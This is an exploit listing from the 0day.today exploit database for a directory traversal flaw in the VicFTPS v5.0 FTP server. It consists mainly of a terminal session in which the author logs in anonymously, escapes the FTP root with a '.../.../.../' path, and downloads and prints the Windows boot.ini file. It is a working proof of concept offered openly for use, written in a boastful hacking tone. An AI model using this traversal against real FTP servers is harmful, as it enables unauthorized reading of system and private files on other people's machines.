[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

VicFTPS v5.0 Directory Traversal

Author
chr1x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12131
Category
remote exploits
Date add
04-05-2010
Platform
windows
================================
VicFTPS v5.0 Directory Traversal
================================

# Exploit Title: VicFTPS v5.0 Directory Traversal
# Date: May 05, 2010
# Author: chr1x
# Description: A simple FTP server for Windows. Does not require an install. Very simple to configure. Supports only one user connection at a time. Supports active and passive mode transfers, MDTM, SIZE, and PASS. Version 5.0 fixed CWD Buffer overflow vulnerability. <- A new vuln here! :D
# Version: 5.0
# Tested on: Windows XP SP3 (Spanish Edition)
 
#########<VULN CONFIRMATION>#########################################
root@olovely:/ddpwn# ftp
ftp> open
(to) 192.168.1.64
Connected to 192.168.1.64.
220 VicFTPS ready
Name (192.168.1.64:ninja): anonymous
331 pretend login accepted
Password:
230 fake user logged in
Remote system type is WIN32.
ftp> ascii
200 Type set to I
ftp> cd .../.../.../
250 CWD command successful
ftp> pwd
257 "/../../"
ftp> get boot.ini
local: boot.ini remote: boot.ini
200 PORT command successful
150 Opening BINARY mode data connection
226 Transfer Complete
211 bytes received in 0.00 secs (92.1 kB/s)
ftp> bye
221 goodbye
 
root@olovely:/ddpwn# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
root@olovely:/ddpwn#
 
#########</VULN CONFIRMATION>#########################################
 
Shot from DDPwNv1.0
[*] Testing Path: .../.../.../  <- VULNERABLE! :P
 
Thiz v00d00 t00l just r0x! Ninjutzu automated hacking babe! lol.
 
http://chr1x.sectester.net



#  0day.today [2024-12-25]  #